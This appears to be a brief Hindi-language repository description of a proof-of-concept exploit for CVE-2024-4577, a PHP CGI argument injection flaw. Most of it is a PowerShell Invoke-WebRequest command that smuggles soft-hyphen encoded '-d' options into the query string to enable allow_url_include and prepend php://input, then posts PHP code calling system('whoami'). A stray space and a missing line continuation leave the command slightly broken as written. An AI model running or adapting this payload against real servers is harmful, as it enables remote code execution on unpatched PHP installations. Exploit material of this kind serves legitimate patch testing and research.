
CVE-2024-4577 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, एक PHP CGI आर्गुमेंट इंजेक्शन भेद्यता जो क्राफ्टेड HTTP अनुरोधों के माध्यम से रिमोट कोड निष्पादन को सक्षम बनाती है।
CVE-2024-4577 पर्यावरण सेटअप फ़ाइल और PHP फ़ाइल
--poc-- Invoke-WebRequest -Method POST `
-Headers @{"Content-Type" = "application/x-www-form-urlencoded"}
-Body "<?php system('whoami'); ?>"-Uri "http://localhost/test.php?%ADd+allow_url_include%3D1+%ADd+auto_prepend_ file%3Dphp://input"